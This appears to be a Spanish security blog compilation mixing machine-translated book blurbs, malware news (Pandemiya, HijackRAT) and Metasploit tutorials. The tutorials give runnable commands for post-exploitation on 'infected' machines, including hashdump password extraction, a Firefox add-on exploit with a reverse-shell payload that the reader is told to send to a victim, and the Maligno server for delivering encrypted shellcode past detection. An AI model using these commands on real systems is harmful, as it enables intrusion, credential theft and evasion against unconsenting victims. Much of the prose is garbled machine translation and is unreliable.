Aprende Nessus -En busca de vulnerabilidades





La seguridad informática es un dominio vasto y apasionante, con Vulnerability Evaluación y pruebas de penetración como la más importante y las actividades que suelen realizar través de las organizaciones para asegurar la infraestructura de TI y satisfacer los requisitos de cumplimiento. Aprender Nessus para pruebas de penetración le da una idea de cómo para realizar VA y PT efectiva utilizando la herramienta de uso común llamado Neso. Este libro le dará a conocer las pruebas comunes, como la evaluación de la vulnerabilidad y pruebas de penetración. La introducción a la herramienta Nessus es seguido por pasos para instalar Nessus en plataformas Windows y Linux. El libro le explicará paso a paso se explica cómo hacer para hacer la exploración y la interpretación resultado, que incluye además la explotación. También se explican las características adicionales que ofrece, tales como el uso de Nessus para pruebas de conformidad. También se explican los conceptos importantes como el análisis de los resultados para eliminar los falsos positivos y la criticidad. Cómo ir sobre la realización de pruebas de penetración mediante la salida de Nessus se explica con la ayuda de fácil de entender ejemplos. Por último, a lo largo de diferentes capítulos, consejos y puntos de vista de desafíos del mundo real que enfrentan durante la actividad VA Se explicarán también. Esperamos que disfrute de la lectura del libro!



24 pecados capitales-Software Security






"Los autores han demostrado una vez más por qué son el" quién es quién "de la seguridad del software. Los 24 pecados capitales de Software de Seguridad es un tour de force para los desarrolladores, profesionales de seguridad, proyecto gerentes, y cualquier persona que sea parte interesada en el desarrollo de la calidad, fiable y Código pensativo-asegurada. El libro ilustra gráficamente el más común y peligroso errores en múltiples idiomas (C + +, C #, Java, Ruby, Python, Perl, PHP, y más) y numerosos conocidos de buenas prácticas para mitigar estas vulnerabilidades y pasado 'redentor' pecados. Su prosa práctica guía a los lectores a través de los patrones de manchas que son predictivos del pecado código (de las funciones de aplicación de alto nivel para búsquedas de cadenas a nivel de código), pruebas de software enfoques y arneses para refinar a cabo los elementos vulnerables, y ejemplos del mundo real de los ataques que se han implementado en la naturaleza. Los consejos y recomendaciones son similarmente los pies en la tierra y por escrito desde la perspectiva de los profesionales experimentados que tienen producido endurecido y software utilizable para el consumo de una amplia gama de audiencias, de los consumidores para abrir las comunidades de origen a las empresas comerciales a gran escala. Recibe esta Biblia de la seguridad del software de hoy, y vete y no peques más! "



Rusia Ofrece $100.000 quien vulnere TOR






La paranoia rusa vuelve a la carga. El Ministerio de Asusntos Internos ofrece una recompensa de 111 mil dólares (o 3,9 millones de rublos) a quien se capaz de aportar maneras para desanonimizar usuarios de TOR y conocer sus datos técnicos, según leemos en The Daily Dot. En otras palabras, quieren levantar la manta y saber quién usa todo el tinglado. Y es que Rusia está viviendo un auténtico auge en el uso de esta herramienta de uso de internet anónimo. El pasado mes de junio hubo más de 200 mil usuarios concurrentes. Esta situación lleva aumentando desde hace algo más de tres meses debido al clima de represión y censura que está viviendo el país más extenso del planeta. Medidas como el registro obligatorio de los bloggers o el uso de lenguaje no ofensivo están haciendo que muchas personas se replanteen sus libertades individuales en el país ex-comunista. Rusia es el último país en unirse a una larga lista de estados que pretenden censurar y/o controlar TOR, entre los que se encuentran: China, Tailandia, Iran, Arabia Saudi, Túnez, Libia o Egipto. Todos ellos con un amplio historial de respeto por las libertades individuales a sus espaldas. Fin de la ironía. Tal vez lo más curioso del caso sea que TOR nació de manos de la marina estadounidense y recibe millones de dólares de los presupuestos del país para mantenerse activa. Algo que no deja de ser contradictorio si pensamos que una de las agencias gubernamentales más famosas del globo, la NSA, gasta otros tantos millones para espiar a todo el mundo. La situación que se está viviendo en estos momentos parece más propia de los años sesenta o setenta donde la Guerra Fría dibujó dos bandos enfrentados que se diluyeron con la caída del muro de Berlin. Sin embargo, apenas 20 años después, las tensiones vuelven a reaparecer y ahora el campo de batalla es Internet. Y ahí no hay fronteras, estamos todos metidos.

Fuente: http://alt1040.com/2014/07/rusia-recompensa-tor

Hacked Japanese porn sites

Este resumen no está disponible. Haz clic en este enlace para ver la entrada.

Post modulos-metasploit






Metasploit tiene una amplia gama de módulos de la explotación después de la que se puede ejecutar en los objetivos comprometidos para reunir pruebas, el pivote más en una red de destino, y mucho más.


Primero hay que tener meterpreter en la maquina comprometida ,yo le subo privilegios como system para evitar errores ,colocamos el comando de background para que nos guarde nuestra sesión de meterpreter y retrocedemos con el comando de back para utilizar los post modulos de metasploit.







voy a usar dos post modulos , uno de ellos lo que hace es trasmitir un video de youtube a todos los sistemas que tengo infectados .se podra ver los videos en el navegador predeterminado y con la ventana maximizada , donde dice VID ponemos el id del video.





msf use post/multi/manage/play_youtube
msf exploit (play_youtube)>set VID 
msf exploit (play_youtube)>set session 1  
msf exploit (play_youtube)>exploit


El segundo nos muestra las aplicaciones que estan instaladas y las vesiones  de la  pc victima .







msf > use post/windows/gather/enum_applications
msf post(enum_applications) > set session 1

msf post(enum_applications) > exploit


Hay otros post modulos que son de gran ayuda como....

use post/windows/gather/checkvm:
verifica si la pc infectada es una maquina virtual o no.


use post/windows/gather/hashdump:
Mostrara la contraseña del administradoor del sistema.

use post/windows/gather/usb_history

Enumera la historia de la unidad USB.

Anti-Hacker Tool Kit, 4th Edition






Bienvenidos a la cuarta edición del Kit de herramientas de Anti-Hacker. Se trata de un libro sobre las herramientas que utilizan los hackers para atacar y defender sistemas. Saber cómo se lleva la
configuración avanzada de un sistema operativo es un paso hacia ser una los piratas cibernéticos. Saber cómo infiltrarse en un sistema es un paso en el mismo camino. Saber cómo controlar la actividad de un atacante y defender un sistema  en el camino hacia el hacking. En otras palabras, la piratería es más sobre el conocimiento y la creatividad de lo que se trata que tiene una colección de herramientas. La tecnología informática resuelve algunos problemas; crea otros. Cuando se resuelve un problema, la tecnología puede parecer maravilloso. Sin embargo, no tiene que ser maravillosa en el sentido de que no tienes idea de cómo funciona. De hecho, este libro pretende mostrar lo fácil que es ejecutar los tipos de herramientas que los piratas informáticos, profesionales de seguridad, y aficionados utilizan. Un buen truco de magia sorprende a la audiencia. Mientras el público, podria adivinar si el mago está realizando algún juego de manos o depender de un cuidado  diseñado. El mago evoca alegría a través de una combinación de habilidad que aparece sin esfuerzo y la mala dirección que sigue siendo alto. Un truco no funciona porque el público carece de conocimiento de algún secreto, pero debido a que el mago ha presentado un tipo de historia, aunque sea breve, con una sorpresa al final. Incluso cuando una audiencia sabe la mecánica de un truco, un mago experto todavía pueden deleitar a ellos. Las herramientas en este libro no son mágicas; y simplemente tenerlos en su computadora portátil no lo hará  un hacker. Pero este libro va a desmitificar muchos aspectos de la seguridad de la información. Usted va a construir una colección de herramientas siguiendo a través de cada capítulo. Más importante aún, usted construirá el conocimiento de cómo y por qué estas herramientas funcionan. Y eso es el conocimiento que sienta las bases para ser creativo con secuencias de comandos, para la combinación de ataques en inteligente maneras, y por pensar en ti mismo como un hacker.



Mastering-Metasploit







Capítulo 1, Acercarse un Penetration Test Utilizando Metasploit, nos lleva a través de los ayuda en establecer un enfoque y la configuración del entorno de prueba. Por otra parte, nos lleva a través de las diferentes etapas de una prueba de penetración sistemática.Es más discute las ventajas del uso de Metasploit sobre las pruebas tradicionales y manual.


Capítulo 2, Reinventar Metasploit, cubre los fundamentos absolutos de programación Ruby elementos esenciales que se requieren para la construcción del módulo. Este capítulo abarca
también la forma de cavar módulos Metasploit existentes y escribir nuestro escáner de encargo, publicar la explotación y módulos de Meterpreter; por último, se resume aarrojar luz sobre el desarrollo de módulos personalizados en railgun. 


Capítulo 3, Proceso de Formulación Explotar, analiza cómo construir hazañas por cubriendo las necesidades básicas de programación en ensamblador. Este capítulo también introduce fuzzing y arroja luz sobre los depuradores también. Luego se centra en los aspectos esenciales de recopilación para la explotación mediante el análisis de comportamiento de la aplicación en un depurador . Es finalmente muestra el proceso en Metasploit explotar-escritura basado en la información recopilada.
  

Capítulo 4, Portar Exploits, ayuda a convertir hazañas públicamente disponibles en el Marco de Metasploit. Este capítulo se centra en la recolección de elementos esenciales de la exploits disponibles escritos en Perl, Python y PHP, y la interpretación de los elementos esenciales en otros más compatibles con Metasploit utilizando bibliotecas Metasploit.
  

Capítulo 5, Acceso a Servicios de Pruebas Fuera del escenario, lleva la discusión a la realización duna prueba de penetración en los distintos servicios. Este capítulo cubre algunos módulos importantes en Metasploit que ayudan en la explotación de los servicios de SCADA. Además, analiza las pruebas una base de datos y ejecutar un comando privilegiado en ello. A continuación, se arroja luz sobre VOIP  la explotación y la realización de ataques como la suplantación de llamadas VOIP. En el extremo, el capítulo trata del período de explotación en iDevices de Apple.
   

Capítulo 6Motivación y estadificación virtuales de ensayo, proporciona una breve discusión sobre la realización una caja blanca, así como una prueba de la caja negro. Este capítulo se centra en las herramientas adicionales que pueden trabajar junto con Metasploit para llevar a cabo una prueba de penetración completa. El capítulo avanza por discutir las herramientas más populares, como Nmap, Nessus, y OpenVAS,  y se analiza la importación de sus resultados en Metasploit y ejecutar estas herramientas desde Metasploit sí. Por último, se analiza cómo generar informes manuales y automatizados.


Capítulo 7, Ataques en la parte cliente sofisticado, cambia nuestro enfoque a las hazañas del lado del cliente. Este capítulo se centra en la modificación de las hazañas de cliente tradicionales en una gran enfoque más sofisticado y cierta. El capítulo comienza con un navegador basado en explotación y exploits basados ​​en archivos de formato. Además, analiza comprometer web servidores y los usuarios de un sitio web. A continuación, se arroja luz sobre antivirus y sin pasar por mecanismos de protección. A continuación, se analiza la modificación de vulnerabilidades del navegador en un arma mortal usando Metasploit junto con vectores como Envenenamiento DNS.


Capítulo 8, La Caja de Herramientas de Ingeniería Social, ayuda en la automatización de la explotación del lado del cliente utilizando Metasploit como backend. En este capítulo se arroja luz sobre varios ataques web vectores y ayuda a llevar a cabo ataques de phishing avanzados. Luego se centra en el ataque vectores tales como tabnabbing, applets de Java, y muchos otros. Además, arroja luz sobre módulos de terceros dentro del Kit de herramientas de ingeniería social. A continuación, se analiza la GUI parte del conjunto de herramientas de ingeniería social y cómo automatizar varios ataques en el mismo.


Capítulo 9, acelerar la tramitación de las pruebas de penetración, se centra en el desarrollo de enfoques rápidos a pruebas de penetración. Este capítulo comienza con una discusión de Vía Rápida y prueba de un base de datos con Fast Track. Además, analiza las características perdidas de Metasploit y cómo volver a habilitarlas en Metasploit. Finalmente, se analiza otra gran herramienta, es decir, WebSploit, y cubre la realización de la explotación en el cliente difícil con él. 


Capítulo 10, La visualización con Armitage, se dedica a la interfaz gráfica de usuario más popular asociado con Metasploit, es decir, Armitage. En este capítulo se acumula en el escaneo de un objetivo con Armitage y la explotación de la meta. Además, analiza Cortana, que se utiliza para script de ataques automatizados en Armitage y ayuda de pruebas de penetración a través del
desarrollo los robots virtuales. A continuación, este capítulo se explica añadiendo funcionalidades  personalizados hasta interfaces personalizadas y menús de Armitage.



La Princesa Hacker




"Princesa de seguridad", es el título oficial de Parisa Tabriz en Google. "Porque Ingeniero de Seguridad de la Información es completamente aburrido y horrible", explicó sobre su cargo, que de hecho encubre lo que hace Tabriz todo el día: hackear a su empleador, la entidad más reconocida de la era de Internet.
A Parisa Tabriz no le importa lo que piensen de ella. Actúa como una persona de pocos amigos y trabaja para una compañía de Silicon Valley. "Algunas personas de otras partes de la industria se presentan a sí mismos como 'vicepresidente', pero a mi no me interesa. Uno podría ser 'el mono número 507', pero si está haciendo cosas interesantes me gustaría más hablar con él que con el vicepresidente senior", contó en un artículo de la revista Elle.
En el mundo de la piratería, Tabriz es básicamente el equivalente a la Bruja Buena del Mago de Oz –con todo el poder y habilidades pero ninguna intención de usar su Ejército de monos para hacer el mal-. Al frente de un equipo de hackers, fue contratada para que piense como un criminal y encuentre las debilidades en Google Chrome antes que alguien más las ataque. Son hackeos preventivos a diario contra el robo de identidad que protege a millones de personas en todo el mundo.
A esto se añade que ella tiene sólo 31 años, es una de las pocas mujeres en los círculos de piratas informáticos, y es lo más alejado del estereotipo de genio tecno. Siempre viste de negro: "Es adelgazante", explicó, encogiéndose de hombros.
Los hackers viven en un constante estado de purgatorio -la línea entre el bien y el mal se oscurece a menudo. El grupo de Tabriz, "los sombreros blancos" (así se hacen llamar), está formado por personas como los buenos samaritanos que devuelven el bolso caro que encuentran en la calle. "Los sombreros negros", en cambio, promocionan saber cómo atacar un sistema y se ofrecen al mejor postor. Tabriz nunca iba a ser una buena candidata para el lado oscuro. "Yo quería ser Jem. ¿Como el dibujo animado Jem y los hologramas, comprendes?".
Conoce algunas mujeres hacker...

Latino América


Eugenia Bahit
Argentina, Arquitecta de Software -especializada en tecnologías GLAMP (GNU/Linux, Apache, MySQL, Python y PHP)- y Agile Coach con un gran enfoque en Scrum y eXtreme Programming.
Blog – twitter


Indira Burga
Perú, Ing. de Sistemas, Certified Scrum Master (CSM), Gestora de Proyectos de desarrollo de software, programadora PHP, analista y nueva amante de la metodología Agile para Gestión de Proyectos. Jefa del Área de Sistemas, por lo cual promueve todo desarrollo y/o implementación bajo plataformas Open Source.
twitter.


Laura Mora
Adm. de Redes y Sistemas GNU/Linux http://blackhold.nusepas.com
Especialidades: GNU/Linux, Seguridad Informática, Redes, Administración de Sistemas


Mª José Montes Diaz
Téc.Informática de gestión; Monitora de Fpo; Docente de programación Python y Scratch. Archera && Activista del software libre y cultura libre.
Córdoba – España · blog.archninfa.org



Milagros Infante M.
Huancayo. 19 años , estudia informática en la Universidad Continental, Perú. Pertenece a la comunidad de Software Libre “LumenHack“.




Internacional



Kristina Vladimirovna Svechinskaya
Es una hacker ruso y estudiante de la Universidad de Nueva York, fue acusada de un complot para defraudar a varios bancos británicos, EE.UU. por sumas considerables y el uso de pasaportes falsos. Según la acusación, Svechinskaya utilizaba el troyano Zeus para atacar a miles de cuentas bancarias .


RAVEN ALDER
Raven tiene un doble fondo, en seguridad de redes e ingeniería de pruebas ISP.Ha trabajado como arquitecto Backbone Senior y Consultor Senior en Seguridad informática. Su interés por la seguridad de las redes de extremo a extremo la ha llevado a examinar y establecer estándares pioneros en la seguridad de la infraestructura de red.


JOANNA RUTKOWSKA
Joanna es un especialista en seguridad informática, es de Polonia y es conocida por su contribución a Windows Vista el 4 de agosto de 2006, durante la conferencia Black Hat Briefings, Rutkowska a demostrado al mundo dos maneras de hackear Windows Vista Beta 2 … y creó la Blue Pill especializada en sigilo.


YING CRACKER
Uno de los hackers más hermosa de China. Ella ha publicado una gran cantidad de articulos en la web, acerca de intrusión.


Xiao Tian
Xiao Tian, ​​19 años, es el “general” de nuevo ejército chino de hackers femeninas, The Cn girl Security Team – en la actualidad, el grupo cuenta con más de 2.200 miembros.




Fuentes:
http://www.infobae.com/2014/07/12/1580171-la-princesa-hacker-que-custodia-la-seguridad-google
http://hackerss.com/mujeres-hackers.html


Zeus troyano venta en foros underground




Un nuevo y relativamente rara programa troyano Zeus ha encontrado que es totalmente diferente de otros troyanos bancarios y tiene capacidad para robar secretamente datos de formularios, credenciales de acceso y archivos de la víctima, así como puede crear páginas web falsas y tomar capturas de pantalla de la computadora de la víctima.
Los investigadores en el equipo de Fraude de RSA Security han descubierto este nuevo y crítico amenaza, apodado como 'Pandemiya', que se está ofreciendo a los criminales cibernéticos en foros underground, como alternativa a la infame troyano Zeus y sus muchas variantes, que es ampliamente utilizado por la mayoría de los ciberdelincuentes por años para robar información bancaria de los consumidores y las empresas.
El código fuente del troyano bancario Zeus está disponible en los foros underground de los últimos años, que conducen a los desarrolladores de malware para diseñar variantes más sofisticadas de troyano Zeus, como Ciudadela, Hielo IX y Gameover Zeus.



Pero, Pandemiya es algo con mucho, la pieza de malware más aisladas y peligrosas como el autor pasó un año en escribir el código para Pandemiya, que incluye 25.000 líneas de código original escrito en C. 
Al igual que otros de Troya comercial, Pandemiya infectar las máquinas a través de paquetes de exploits ya través de ataques drive-by download para impulsar la tasa de infección que explotan fallas en el software vulnerable, tales como Java, Silverlight y Flash dentro de unos segundos tierras a las víctimas de la página web. 
"Calidad de codificación de Pandemiya es bastante interesante, y contrariamente a las tendencias recientes en el desarrollo de malware, no se basa en el código fuente de Zeus en absoluto, a diferencia de Ciudadela / Ice IX, etc," los investigadores de RSA, la división de seguridad de EMC, dijo el martes en una entrada de blog. "A través de nuestra investigación, nos enteramos de que el autor de Pandemiya pasó cerca de un año de la codificación de la aplicación, y que consta de más de 25.000 líneas de código original en C."

Pandemiya troyano utiliza Windows API CreateProcess para inyectar a sí mismo en cada nuevo proceso que se inició, incluyendo Explorer.exe y re-inyecta cuando sea necesario. Pandemiya se vende por hasta $ 2,000 USD y proporciona todas las características desagradables incluyendo la comunicación encriptada con los servidores de comando y control, en un esfuerzo para evitar la detección. 
El troyano ha sido diseñado con una arquitectura modular para cargar los plug-ins más externas, que permite a los hackers añadir características extra simplemente escribiendo nueva DLL (biblioteca de vínculos dinámicos). Los plug-ins adicionales añadir fácilmente capacidades de funcionalidad principal del troyano, es por eso que el desarrollador cobra un extra de $ 500 USD para conseguir la aplicación principal, así como sus plugins, que permite a los ciberdelincuentes para abrir proxies inversos en los ordenadores infectados, para robar credenciales FTP y para infectar los archivos ejecutables con el fin de inyectar el malware en el arranque. 
"La llegada de una nueva aplicación de malware troyano recién codificado no es muy común en el metro," Marcus escribe, y agrega que el enfoque modular en Pandemiya podría hacer "más penetrante en el futuro cercano." 
Los desarrolladores de malware también están trabajando en otras nuevas características para agregar conexiones de Protocolo de escritorio remoto inversa y un módulo de ataque de Facebook con el fin de difundir el troyano a través de Facebook secuestrados.

COMO QUITAR PANDEMIYA TROJAN 

El troyano se puede quitar fácilmente con una pequeña modificación en la acción de línea del registro y del sistema, tal como se explica a continuación: 
Busque la clave del Registro HKEY_LOCAL_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run e identificar los archivos *. EXE nombre de archivo en la carpeta de su usuario Datos de programa '. Anote el nombre y eliminar el valor del Registro. 
Busque la clave HKEY_LOCAL_MACHINE \ System registro \ CurrentControlSet \ Control \ Session Manager \ AppCertDlls. Encuentre el valor con el mismo nombre que el archivo EXE *. En el paso anterior. Tenga en cuenta el nombre del archivo y eliminar el valor del Registro. 
Reinicie el sistema. En esta etapa Pandemiya está instalado pero ya no se ejecuta. Eliminar tanto archivos señalados anteriormente. Esto eliminará los últimos rastros del troyano. Su sistema está ahora limpio. 
Mantenerse a salvo!

Fuente:
The hacker news

HijackRat nuevos ataques de malware de Android




Los ciberdelincuentes han lanzado una nueva aplicación Android malicioso que envuelve diferentes variedades de fraude bancario truco en una sola pieza de malware móvil avanzada. 

MARCO DEL SERVICIO GOOGLE - APLICACIÓN O MALWARE? 

Los investigadores de seguridad de la empresa de seguridad FireEye han venido a través de una aplicación para Android malicioso que une las últimas y más antiguas técnicas de secuestro. La aplicación Android malicioso combina el robo de datos privados, el robo de credenciales de la banca y la suplantación de identidad y acceso remoto en una sola unidad, donde el malware tradicional ha tenido sólo una tal capacidad incluidos en el mismo. 
Los investigadores llamaron el malware como HijackRAT, un troyano bancario que viene cargado con una aplicación de Android maliciosos que se disfraza como "Marco de Google servicio", la primera y la muestra de malware para Android más avanzado de su tipo que se ha descubierto, la combinación de las tres actividades maliciosas juntos. 

CARACTERÍSTICAS DE MALWARE 

Al dar el mando a distancia del dispositivo infectado a los hackers, la aplicación de malware espeluznante: 
robos y envía mensajes SMS 
roba contactos 
inicia actualizaciones de aplicaciones maliciosas 
exploraciones para aplicaciones bancarias legítimas instalados en el teléfono móvil de la víctima y reemplazarlos con falsificaciones utilidades 
intentos de desactivar cualquier solución de software de seguridad móvil o antivirus que pueda estar instalado en un dispositivo Android comprometida 

¿SE NECESITA Mobile Antivirus? GOOGLE DICE "NO" 

A pesar de estrictas advertencias de las empresas de seguridad, jefe de seguridad de Android de Google dice que la mayoría de los usuarios de dispositivos Android no es necesario instalar ninguna solución antivirus y otras aplicaciones de seguridad para proteger sus dispositivos. 

Los investigadores de seguridad de Google dicen que los que utilizaron antivirus o aplicación de seguridad en su teléfono probablemente en realidad nunca recibir protección de ella, y debido a que cada aplicación Android se va a través del sistema automatizado que Google comprobó para cada tema, y verificó esas aplicaciones que no contenían ninguna malware o actividades maliciosas antes de que se pusieron a disposición en la App Store. 
Pero, la pregunta aquí es que si cada aplicación Android se va a través del Sistema Automatizado de Google, entonces ¿por qué Google Play Store está rodeado de tantas aplicaciones maliciosas? Ahora bien, esto realmente necesita para responder. 
Dirigidas actualmente los bancos coreanos 
Volviendo al tema, esta aplicación Android malicioso no puede ser retirado del dispositivo a menos que los usuarios desactivan sus privilegios administrativos. La última versión de la aplicación maliciosa se ​​está utilizando actualmente para estafar a los clientes de ocho bancos coreanos populares, pero podría ser fácilmente adaptada por los hackers para atacar instituciones financieras europeas. 
"Si bien se limita sólo a los 8 bancos coreanos en este momento, el hacker podría añadir fácilmente en la funcionalidad de cualquier otro banco con cerca de 30 minutos de trabajo", dice el blog. 

ADVERTENCIA: VARIANTE ROBUSTA PRONTO 

Funcionalidad incompleto de HijackRAT parece estar diseñado para realizar ataques de "secuestro de banco", según un análisis realizado por FireEye.




que la naturaleza única de esta aplicación malware, sobre todo su capacidad para robar información personal de los usuarios del dispositivo y hacerse pasar como aplicaciones bancarias, indica que podría ser un ataque de prueba y una amenaza de banca móvil aún más robusto podría estar en el horizonte, dijo el investigadores. 

SOLUCIÓN: ¿QUÉ HACER? 

Dado que, el malware está en alza y los usuarios especialmente Android se enfrentan la mayoría de los problemas. Tener un pensamiento, Si cualquier tipo de malware es el robo de sus mensajes del dispositivo y luego de la aplicación es, sin duda tomando permisos para leer los mensajes y si se está robando los contactos del dispositivo entonces está teniendo permiso para leer tus contactos, y lo mismo para otras capacidades. 
Por lo tanto, se le aconseja que lea el permiso siempre antes de instalar la aplicación en tu teléfono, y si alguna aplicación como aplicación de mensajería que definitivamente requiere permiso para leer tus contactos, mensajes, ubicación, etc, entonces primero revise las revisiones de esa aplicación en particular sobre la Internet y Play Store, y siempre trato de instalar sólo la aplicación Android de renombre en el dispositivo.

Fuente:
The hacker news

Obtener Shell con Firefox



Este exploit dinámicamente crea un archivo de addon XPI.. El bootstrap addon Firefox resultante se presenta a la víctima a través de una página web.
Navegador Firefox de la víctima se abrirá un cuadro de diálogo preguntando si confían en el addon. Una vez que el usuario hace clic en "install", el complemento se instala y ejecuta la carga útil con permisos de usuario. A partir de Firefox 4, esto va a funcionar sin un reinicio como el addon está marcado para ser "bootstrap". A medida que el complemento se ejecutará la carga útil después de cada reinicio Firefox, una opción puede ser dada a desinstalar automáticamente el complemento una vez que la carga ha sido ejecutado. En Firefox 22,0-27,0, CVE-2014-1510 nos permite saltarnos la primera mitad de los permisos con prontitud.

En este caso se obtendra una shell del sistema pero podemos convertir esa shell

en una sesión de meterpreter con varias tecnicas.







Cita:msf use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload
firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost(IP)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit

Solo hay que enviar el enlace a la victima,se tendra que instalar el addon para firefox.





Esperamos la conexion y ejecutamos el comnado de sessions para comprobar si llego la shell.


Arrancamos la sesión con el numero de id y listo tenemos una shell del sistema infectado con el comando HELP podemos ver todas las opciones que nos permite realizar en el sistema.




Servidor para Metasploit



En esta ocasión Maligno no tiene que ver con Chema Alonso . Se trata de una herramienta de código abierto de la firma Encripto AS para servir payloads de Metasploit en un test de intrusión. Es decir, genera shellcodes con msfvenom y los transmite por HTTP o HTTPS. Eso sí, el shellcode es cifrado con AES y codificado con Base64 antes de enviarse.

Maligno tiene también una parte cliente para descargar el payload de Metasploit cifrado. Una vez que se recibe el shellcode, el cliente lo descodifica, lo descifra y lo inyecta en la máquina objetivo. Como resultado, obtendremos una sesión de Metasploit evadiendo detecciones...






1.- Instala python-ipcalc (dependencia):

Cita:sudo apt-get update && sudo apt-get install python-ipcalc

2.- Descarga y descomprime Maligno:

Cita:http://www.encripto.no/tools/maligno-1.1.tar.gz

3.- Genera un certificado auto-firmado con el siguiente script:

Cita:./certgen.sh

4.- Configura el servidor Maligno ajustando las opciones en server.conf:

Cita:Echa un vistazo al fichero server.conf.explained

5.- Ejecuta el servidor Maligno:

Cita:python maligno_srv.py

6.- Genera un cliente:

Cita:python clientgen.py -i 0 -f server.conf -o my_client.py

Cita:-i: Índice del payload (payload especificado en el fichero de configuración del server, empezando desde 0)
-f: Fichero de configuración del servidor Maligno
-o: Fichero de salida donde se escribirá el código del cliente

7.- Manejador de Metasploit
Arranca msfconsole con el fichero de recursos generado por Maligno

Cita:msfconsole -r reverse_tcp_192.168.0.2_4444.rc

8.- Empieza a conseguir shells!

Autor:VICENTE MOTOS